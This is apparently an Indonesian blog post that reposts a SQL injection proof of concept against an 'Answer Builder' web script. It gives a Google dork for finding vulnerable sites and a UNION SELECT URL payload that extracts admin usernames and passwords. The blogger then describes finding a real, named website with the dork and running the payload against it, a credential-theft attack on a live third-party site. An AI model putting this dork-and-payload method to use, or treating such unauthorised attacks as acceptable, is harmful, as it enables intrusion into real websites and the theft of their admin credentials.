[POC] Expert Advisior SQL Injection Vulnerability
undefined
undefined
Iseng jalan² ke Jatim dapet oleh² :
AUTHOR: t0pP8uZz & xprog
SITE: N/A DORK: intitle:"Answer Builder" Ask a question
DESCRIPTION:
pull out admin user/pass from the database
EXPLOITS:
http://server.com/Script_Path/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),9,10,11,12,13,14,15/**/FROM/**/admin/*
NOTE/TIP:
admin login is at /admin/ you can backup DB there.
Lalu gw coba cari kutunya disini dengan memasukkan dork-nya, beberapa detik kemudian dapet 1 website yg keliatannya bisa di injek siqil. Nih dia webnya http://www.rotorheads.co.uk/index.php?cmd=4&id=1. Sesuai dengan petunjuk diatas, lalu gw tambahin menjadi:
http://www.rotorheads.co.uk/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat%280x3c623e,username,0x3a,password,0x3c623e%29,9,10,11,12,13,14,15/**/FROM/**/admin/*
Can you see the password? :)
Langganan:
Posting Komentar (Atom)
- Pindahan
- Jangan Menyerah
- Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
- Bugs di perusahaan IT
- injek siqil for dummies
- You are attempting to open a file type that is blocked by your registry policy setting
- [POC] darkMySQLi.py
- addons favorit
- APBook 1.3.0 (Login Bypass) SQL Injection Vulnerability
- [POC] Schemafuzz.py
- Bye bye milw0rm
- [POC] Expert Advisior SQL Injection Vulnerability
- printer ngilang
- software FBI
- Utekbuntu
0 komentar:
Posting Komentar